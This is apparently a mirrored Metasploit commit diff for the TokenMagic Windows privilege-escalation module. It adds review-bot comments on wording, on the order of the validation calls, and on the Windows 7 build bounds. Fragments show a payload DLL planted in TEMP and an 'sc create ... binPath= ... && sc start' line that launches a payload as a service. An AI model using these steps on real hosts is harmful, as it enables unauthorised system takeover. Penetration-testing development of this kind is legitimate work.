mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-09-25 10:48:31 +02:00
Land #15223, move TokenMagic validation logic
commit 8e4a33f2a2
@ -11,9 +11,11 @@ The module exploits the high IL gained from the "token magic" by either starting
on a known DLL in `system32`.
### Installation And Setup
Windows 10 versions 1803 is vulnerable out of the box. Token Magic works on Windows 7, 8, 8,1 and Windows 10 instances up to 1803. The DLL
Windows 10 versions 1803 is vulnerable out of the box. Token Magic works on Windows 7sp1, 8, 8,1 and Windows 10 instances up to 1803. The DLL
hijacking method in this module relies on a DLL that is only usable in Windows 1703 - 1803 and will not work on other
versions. Also note the DLL method uses a trigger that can take up to ten minutes to return a shell.
versions. Also note the DLL method uses a trigger that can take up to ten minutes to return a shell. The technique
may work on Windows 7 sp0, but loading powershell appears to crash the session. You might be able to upload and run
the powershell script manually after some edits to accomplish access to a Windows 7 sp0 target.
## Verification Steps
1. Start msfconsole
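Review bot: the reworded supported-versions line still carries two nits that are worth fixing while the line is being touched: "Windows 10 versions 1803 is vulnerable" should read "Windows 10 version 1803 is vulnerable", and "8,1" should be "8.1". The service-pack notation is also inconsistent between the edited line ("Windows 7sp1") and the new sentence ("Windows 7 sp0"); suggest "Windows 7 SP1" and "Windows 7 SP0" in both places so readers see at a glance that the SP1 floor is the deliberate change here.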
@ -139,6 +139,10 @@ minutes to trigger', 'SERVICE', ['SERVICE', 'DLL']
writable_dir = session.sys.config.getenv('TEMP')
end
# Check target
validate_active_host
validate_payload
if datastore['METHOD'] =~ /DLL/i
bin_path = "#{writable_dir}\\WindowsCoreDeviceInfo.dll"
payload = generate_payload_dll
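Review bot: placing validate_active_host and validate_payload ahead of the METHOD branch is the right ordering: a target or payload that fails validation is now rejected before generate_payload_dll runs and before bin_path is assembled, instead of after the payload has already been produced. The relocated block carries only the `# Check target` comment, though; if the status message that accompanied these calls at their old location is meant to survive, it belongs here too, directly above validate_active_host.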
@ -156,11 +160,6 @@ minutes to trigger', 'SERVICE', ['SERVICE', 'DLL']
cmd_args = "/c sc create #{service_name} binPath= #{bin_path} type= own start= demand && sc start #{service_name}"
end
# Check target
print_status('Checking Target')
validate_active_host
validate_payload
# Upload the payload
print_status("Uploading payload to #{bin_path}")
write_file(bin_path, payload)
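Review bot: the removed block included print_status('Checking Target'), and that line is not re-added where the validation now lives earlier in the method, so the user-visible "Checking Target" message is silently lost by this change. Unless dropping it is intentional, carry it over alongside the moved validate_active_host call:
  print_status('Checking Target')
  validate_active_host
  validate_payload
Removing the calls from this spot is otherwise sound: write_file now only executes on a target that has already passed validation.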
@ -217,11 +216,11 @@ minutes to trigger and recieve a shell.")
vprint_status("Build Number = #{build_num}")
if datastore['METHOD'] =~ /service/i
# Service method has been tested on Windows 7, 8 and 10 (1803 and ealier)
return Exploit::CheckCode::Appears if (build_num >= 7600 && build_num <= 17134)
return Exploit::CheckCode::Appears if (build_num >= 7601 && build_num <= 17134)
elsif (sysinfo_value =~ /10/ && build_num >= 15063 && build_num <= 17134)
# DLL method has been tested on Windows 10 (1703 to 1803)
return Exploit::CheckCode::Appears
elsif (datastore['METHOD'] =~ /dll/i && build_num >= 7600 && build_num < 15063)
elsif (datastore['METHOD'] =~ /dll/i && build_num >= 7601 && build_num < 15063)
print_error("The current target is not vulnerable to the DLL hijacking technique. Please try setting METHOD to 'SERVICE' and then try again!")
end
Exploit::CheckCode::Safe
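Review bot: raising the lower bound from 7600 to 7601 in both conditions moves the floor from Windows 7 RTM (build 7600) to Windows 7 SP1 (build 7601), which matches the documentation change in this PR, but the comment directly above the service condition still reads "tested on Windows 7, 8 and 10 (1803 and ealier)"; update it to "Windows 7 SP1, 8 and 10 (1803 and earlier)" so the comment agrees with the check and the "ealier" typo goes away at the same time. The DLL branch for builds 7601 to 15062 prints its error and then falls through to Exploit::CheckCode::Safe, which is the intended result; a short comment on that branch saying so would save the next reader from wondering whether a return was forgotten.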